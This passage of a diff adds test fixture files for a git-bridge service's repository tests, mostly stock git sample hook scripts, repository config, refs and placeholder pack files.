+oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." >&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) + echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/index new file mode 100644 index 0000000..ac6d4fd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/refs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/refs new file mode 100644 index 0000000..9c9037a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/refs @@ -0,0 +1 @@ +71ebe5d70c8634f7531cc09c1cad5dae951a9052 refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/logs/HEAD new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4632440628786417060.pack b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4632440628786417060.pack new file mode 100644 index 0000000..c1a7bd5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4632440628786417060.pack @@ -0,0 +1 @@ +blah blah blah diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4635689790689803605.pack b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4635689790689803605.pack new file mode 100644 index 0000000..6e5fe03 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4635689790689803605.pack @@ -0,0 +1 @@ +i am a pack diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/info/packs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/info/packs new file mode 100644 index 0000000..bbfa012 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/info/packs @@ -0,0 +1,2 @@ +P pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx new file mode 100644 index 0000000..30d5e13 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack new file mode 100644 index 0000000..d28e3bd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/packed-refs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/packed-refs new file mode 100644 index 0000000..102f77f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/packed-refs @@ -0,0 +1,2 @@ +# pack-refs with: peeled fully-peeled +71ebe5d70c8634f7531cc09c1cad5dae951a9052 refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/file1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/file1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/file2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/file2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/.gitignore new file mode 100644 index 0000000..5545880 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/.gitignore @@ -0,0 +1,2 @@ +*.ignored + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..217e7d6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. + else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." >&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) + echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/index new file mode 100644 index 0000000..06891a6 Binary files /dev/null and 